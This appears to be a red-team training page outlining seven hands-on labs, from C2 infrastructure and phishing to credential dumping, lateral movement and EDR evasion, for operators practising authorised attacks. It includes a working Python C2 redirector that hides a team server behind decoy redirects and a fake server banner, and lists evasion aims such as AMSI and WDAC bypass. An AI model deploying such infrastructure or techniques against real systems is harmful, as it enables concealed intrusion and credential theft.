Red Team Operator: Hands-On Labs

Real-World Adversary Tactics, Practiced the Right Way

These labs are designed for post-Bootcamp operators who are ready to go deep.
Each lab simulates a real-world scenario with technical goals and operational constraints, helping you internalize tools, think strategically, and build muscle memory as an operator.


๐Ÿงฐ Lab Format

  • Fully provisioned infrastructure (cloud or local) per lab
  • Instructor guidance or self-paced instructions (your choice)
  • Real offensive tooling, scripting, and OPSEC planning
  • MITRE ATT&CK mapping and objectives per lab
  • Clear success criteria and optional reflection questions

Lab Modules Overview


๐Ÿงฑ Lab 1: Infrastructure & OPSEC Basics

Goal: Set up your Red Team infrastructure safely and stealthily

  • Registering domains and standing up redirectors
  • Deploying C2 (e.g., Sliver, Mythic) with HTTPS/DNS transports
  • Setting up a phishing server with OPSEC in mind
  • DNS configuration, domain fronting (where a CDN still permits it; most major providers now block it), and redirector chaining
  • Lab outcome: A working C2 infrastructure whose traffic survives basic detection testing
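The core job of a redirector is to let only traffic that matches the implant's profile reach the team server and to send everything else (scanners, sandboxes, curious analysts) to a decoy. The following is an added example, not part of the lab materials: in practice this filtering usually lives in Apache mod_rewrite or nginx in front of the C2, but the same decision rules are written here in Python so they can be run and tested offline. The upstream address, decoy URL, User-Agent string, beacon paths, and the `X-Session` header are all assumed placeholders.

```python
"""Redirector routing logic: only implant-looking traffic is forwarded to C2.

Added example (not the lab's own code). All policy values below are assumed
placeholders; replace them with the profile your C2 transport actually uses.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit
import urllib.request

# --- Redirector policy (assumed values) ------------------------------------
C2_UPSTREAM = "https://10.0.0.5"          # team server behind the redirector
DECOY_URL = "https://www.example.com/"    # where non-matching traffic is sent
IMPLANT_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Lab-Implant/1.0"
IMPLANT_PATHS = {"/api/v1/status", "/updates/check"}   # beacon URIs
SESSION_HEADER = "x-session"              # implant adds this on POST check-ins


def route(method: str, path: str, headers: dict) -> tuple:
    """Return ("c2", upstream_url) or ("decoy", DECOY_URL) for one request.

    Every rule must match; a request that is wrong in any detail is treated
    as hostile and never sees the team server.
    """
    h = {k.lower(): v for k, v in headers.items()}   # header names are case-insensitive
    if h.get("user-agent", "") != IMPLANT_UA:
        return ("decoy", DECOY_URL)
    if urlsplit(path).path not in IMPLANT_PATHS:       # ignore query string when matching
        return ("decoy", DECOY_URL)
    if method == "POST" and SESSION_HEADER not in h:  # check-ins must carry a session id
        return ("decoy", DECOY_URL)
    return ("c2", C2_UPSTREAM + path)


class RedirectorHandler(BaseHTTPRequestHandler):
    # Present a generic web server banner instead of Python's default.
    server_version = "Apache/2.4.41 (Ubuntu)"
    sys_version = ""

    def _handle(self):
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length) if length else None
        decision, target = route(self.command, self.path, dict(self.headers))
        if decision == "decoy":
            # Log the miss: repeated decoy hits from one source usually mean a scanner.
            self.log_message("decoy <- %s %s ua=%r", self.command, self.path,
                             self.headers.get("User-Agent"))
            self.send_response(302)
            self.send_header("Location", target)
            self.end_headers()
            return
        # Forward the request to the team server; Host is rewritten by urllib.
        fwd_headers = {k: v for k, v in self.headers.items() if k.lower() != "host"}
        req = urllib.request.Request(target, data=body, method=self.command, headers=fwd_headers)
        try:
            # Assumes the team server certificate is trusted by this host.
            with urllib.request.urlopen(req, timeout=10) as resp:
                payload = resp.read()
                self.send_response(resp.status)
                for k, v in resp.getheaders():
                    if k.lower() not in ("transfer-encoding", "connection"):
                        self.send_header(k, v)
                self.end_headers()
                self.wfile.write(payload)
        except Exception:
            self.send_response(502)
            self.end_headers()

    do_GET = _handle
    do_POST = _handle


if __name__ == "__main__":
    # Listen on 8080 here; terminate TLS in front of this with your real certificate.
    HTTPServer(("0.0.0.0", 8080), RedirectorHandler).serve_forever()
```

Note the fail-closed design: a request is forwarded only if the User-Agent, the path, and (for check-ins) the session header all match. Anything else gets a 302 to the decoy and a log line, which is also where you first notice a sandbox replaying your phishing link.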

Lab 2: Initial Access - Phishing and Payload Delivery

Goal: Gain access through a crafted phishing campaign

  • Creating malicious documents, HTA files, and custom payload droppers
  • Macro evasion and Office tricks (note that Office now blocks macros by default in files carrying the Mark of the Web, so delivery has to account for this)
  • Payload delivery through the phishing infrastructure built in Lab 1
  • Achieving a first beacon with minimal detection
  • Lab outcome: Remote code execution on a target machine and a C2 callback

๐Ÿง Lab 3: Post-Exploitation & Credential Harvesting

Goal: Escalate privileges and extract useful credentials

  • Local enumeration and privilege escalation (Windows and Linux)
  • Credential dumping (LSASS, DPAPI, Mimikatz variants)
  • Token theft and process injection
  • OPSEC tips for local post-exploitation
  • Lab outcome: Elevated access and harvested credentials stored securely

๐Ÿ” Lab 4: Lateral Movement & Pivoting

Goal: Move across the environment without being seen

  • Mapping the internal network
  • Pivoting via RDP, SMB, WinRM, and SSH tunnels
  • Using SharpHound/BloodHound to identify attack paths
  • Credential reuse, token impersonation, and domain trust abuse
  • Lab outcome: Access to a second machine in a domain user or domain admin context

Lab 5: C2 Management & Stealth Operations

Goal: Maintain operational control across multiple compromised hosts

  • Beacon staging, sleep and jitter cycles, and operational security
  • Managing multiple sessions and objectives at once
  • Evasion via encryption, obfuscation, and control of the execution context
  • Running memory-only payloads
  • Lab outcome: Ongoing access and staged post-exploitation across multiple hosts

Lab 6: Custom Payloads & Evasion

Goal: Develop payloads that bypass EDR and other controls

  • Building payloads with custom loaders or shellcode runners
  • Obfuscation techniques in PowerShell, C#, and Python
  • Bypassing AMSI, WDAC, and common EDR signatures
  • Testing in monitored environments so you can see what each control catches
  • Lab outcome: Custom payloads that evade the controls monitored in the lab

๐Ÿ” Lab 7: Operational Planning & Threat Emulation

Goal: Execute a mission from start to finish like a real Red Team operator

  • Planning and documentation: assumptions, objectives, and rules of engagement
  • Building an attack chain from initial access through exfiltration
  • Mapping every technique used to MITRE ATT&CK
  • Producing operator notes, a report, and a debrief
  • Lab outcome: A complete end-to-end red team simulation

Guidance, Not Hints

These labs are not step-by-step tutorials. They’re structured practicals, with objectives, tooling options, and references, but you’re expected to think, try